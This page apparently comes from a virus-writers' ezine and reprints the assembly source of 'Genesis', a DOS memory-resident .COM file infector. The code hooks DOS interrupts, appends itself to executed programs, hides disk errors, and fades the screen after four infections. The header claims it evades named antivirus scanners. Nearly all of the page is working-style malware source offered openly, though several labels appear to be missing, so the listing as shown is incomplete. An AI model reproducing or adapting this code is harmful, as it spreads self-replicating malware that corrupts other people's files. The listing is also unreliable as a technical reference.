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Revel_1.004: Genesis Virus, by Holy Spirit

eZine's profile picture
Published in 
 · 20 Feb 2022

;                               Genesis v1.00 
; -------------
; "As long as the earth endures,
; seedtime and harvest,
; cold and heat,
; summer and winter,
; day and night
; will never cease."
; -Genesis 8:22
; --------------------------------
; Memory Resident .COM Infector
; -----------------------------
; Critical Error Handler
; ----------------------
; Screen Routine After 4 Infections
; ---------------------------------
; Interesting Techniques
; ----------------------
; Unable To Be Scanned By Known Scanners
; (F-Prot, TBscan, Scan)
; --------------------------------------
; Written by Holy Spirit
; ≈rinity
; ----------------------
; Also: to run effectively, a stub of 4 bytes should be appended to the
; beginning of the virus.

.model tiny
.radix 16
org 100
call get_offset
db 'F'
mov bp,sp
mov bp,[bp]
dec sp
dec sp
sub bp, offset get_offset-1 ; set offset of start

mov ax, 3565 ; Is Int 65 hooked?
int 21
mov bx, es
cmp bx, 0
jne in_memory

sub word ptr ds:[02], 40 ; lower top of mem by 1K

mov ax,ds
dec ax ;Get Segment of MCB
mov ds,ax

sub word ptr ds:[03],40 ;Subtract 1K from host's MCB

xor ax,ax
mov ds,ax ;Allocate 1K from Bios
dec word ptr ds:[413]

mov ax,word ptr ds:[413] ;Get memory in 1K
mov cl,6
shl ax,cl ;change to segment
;AX now equals free segment
;of memory
sub ax, 10
mov es,ax ;Set ES = Free Segment
push cs ;And DS = Code Segment
pop ds

mov di,100 ;keep offset the same as COM
lea si,[bp+start]
mov cx,(_end-start+1)/2
push [si]
pop ax
inc si
inc si
loop MoveIntoMem

push es es ; set ds and dx to new segment
pop dx ds
xor ax, ax
mov es, ax ; ES = 0


mov word ptr es:[65*4], offset Int_65 ; Set Int 65
mov word ptr es:[65*4+2], dx

mov word ptr es:[1c*4], offset Int_1c ; Set Int 1C
mov word ptr es:[1c*4+2], dx

lea ax, Int_21 ; Set Int 21
xchg word ptr es:[21*4], ax
xchg word ptr es:[21*4+2], dx
mov ds:[IP_21], ax
mov ds:[CS_21], dx

push ax dx
pop es:[69*4+2]
pop es:[69*4]


mov di, 100 ; set DI to start of program
lea si, [bp+storage_bytes+10] ; Set SI to offset of storage
; bytes plus one segment
push cs cs
pop es bx ; Set ES to Code Segment
xor ax, ax ; Reset AX register
dec bx
mov ds, bx ; Set DS to one segment less
; than Code Segment
mov ax, [si] ; Put back original four bytes
mov word ptr [di+10], ax ; at beginning of program
mov ax, [si+2]
mov word ptr [di+2+10], ax
inc bx
mov ds, bx ; Reset DS back to CS
xor bx, bx ; Reset all other registers
xor cx, cx
xor dx, dx
jump_to db 0e9
progstart dw start-progstart-6

inc ah
cmp ax, 4c00 ; Is it a regular execute?
je have_fun ; No? Exit.
jmp go_int21

push ax bx cx dx si di es ds

xor ax, ax
mov es, ax
push es:[24*4]
push es:[24*4+2]
push cs ; capture critical error handler
push offset int_24 ; for those unwanted "write
pop es:[24*4] ; protected" disks...
pop es:[24*4+2]

mov ax, 3d02 ; open for read/write
int 69
jc no_open ; did it open right? If not get out.
xchg bx, ax ; BX = file handle

mov ah, 3f ; Read first four bytes
push cs
pop ds
lea dx, storage_bytes
mov cx, 4
int 69

mov ax, word ptr storage_bytes ; If it's an EXE close
add ah,al
cmp ah,'M'+'Z'
je close_it

cmp byte ptr [storage_bytes+3], 0fe ; if already infected close
je close_it

inc cs:infected_four ; Keep track of number infected

mov ax, 4202 ; Go to end of file
xor cx, cx
xor dx, dx
int 69

not ax
mov progstart, ax
sub progstart, jump_to-start+2
not ax

sub ax, 3 ; Calculate jump to virus
mov word ptr jump_to_virus+1, ax ; Store jump in memory

push cs:infected_four ; save current number of infections
mov cs:infected_four, 0 ; set to zero for copying

mov ah, 40
mov cx, _end-start
mov dx, offset start
int 69 ; append virus to program

pop cs:infected_four ; reset back to original value

mov ax, 4200
xor cx, cx
xor dx, dx
int 69 ; jump back to beginning of program

mov ah, 40
mov cx, 4
mov dx, offset jump_to_virus
int 69 ; write the jump to the virus

mov ah, 3e ; close the file
int 69
pop es:[24*4+2]
pop es:[24*4] ; reset critical error handler
pop ds es di si dx cx bx ax ; reset original registers
dec ah
db 0ea ; call a real Int 21
IP_21 dw ?
CS_21 dw ?

mov al, 3

Int_65: ; fake interrupt to check for
iret ; installation

count2 db 1 ; variable to keep track of fading

push ax cx dx ds si ; push registers
cmp cs:infected_four, 4 ; only run if four files have been
jb return2 ; infected since installation
cmp cs:count2, 1
je C1
cmp cs:count2, 2
je C2
cmp cs:count2, 3
je C3
mov dl, 7
mov cs:count2, 1
jmp setup
mov dl, 8
mov cs:count2, 2
jmp setup
mov dl, 0
mov cs:count2, 3
jmp setup
mov dl, 8
mov cs:count2, 4

mov ax, 0b800
mov ds, ax
mov cx, 2000d
mov si, 1
mov byte ptr [ds:si], dl
add si, 2
loop loop_
pop si ds dx cx ax

infected_four dw 0
storage_bytes db 0cdh, 20, 90, 0fe
jump_to_virus db 0e9, 00, 00, 0fe

end start

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